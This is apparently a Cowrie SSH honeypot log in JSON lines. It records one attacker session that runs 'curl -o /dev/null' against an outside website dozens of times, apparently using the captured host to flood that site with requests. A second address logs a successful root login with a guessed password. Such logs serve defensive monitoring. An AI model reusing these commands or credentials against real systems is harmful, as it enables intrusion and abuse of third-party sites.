{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.176329Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.213711Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.214648Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.215651Z","src_ip":"223.197.186.7","session":"3fc2530ca8b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.252735Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.254015Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.292765Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.293894Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.333016Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.334005Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.371568Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.373525Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.418308Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.419277Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.456289Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.457248Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.494823Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.496128Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.532709Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.533699Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.571128Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.572061Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.648313Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.649319Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.685826Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.686803Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.723845Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.724803Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.764657Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.765623Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.805022Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.805988Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.843125Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.844362Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.919268Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.920307Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.958560Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.959697Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:11.998237Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:11.999594Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.043362Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.044386Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.082512Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.083551Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.120499Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.121477Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.160976Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.161892Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.201793Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.202808Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.239986Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.241062Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.277836Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.278809Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.299031Z","src_ip":"223.197.186.7","session":"3fc2530ca8b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.318689Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.319622Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.356531Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.357443Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.395436Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.396397Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.433329Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.434331Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.471667Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.472658Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.510116Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.511027Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.553427Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.554450Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.558124Z","src_ip":"223.197.186.7","session":"3fc2530ca8b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.593895Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.595005Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.634405Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.635819Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.658230Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.674406Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.675386Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.716717Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.718540Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.755472Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.756475Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.798619Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.799721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.837467Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.838848Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.876322Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.877387Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.915936Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.916839Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.953872Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.955137Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:12.994866Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:12.995871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.032607Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.033546Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.070941Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.071923Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.113272Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.114272Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.153734Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.154763Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.194084Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.195011Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.235621Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.236539Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.274120Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.275359Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.316050Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.316951Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.355822Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.356753Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.396197Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.397425Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.435311Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.436211Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.473606Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.474556Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.511744Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.512778Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.549736Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.550723Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.587123Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
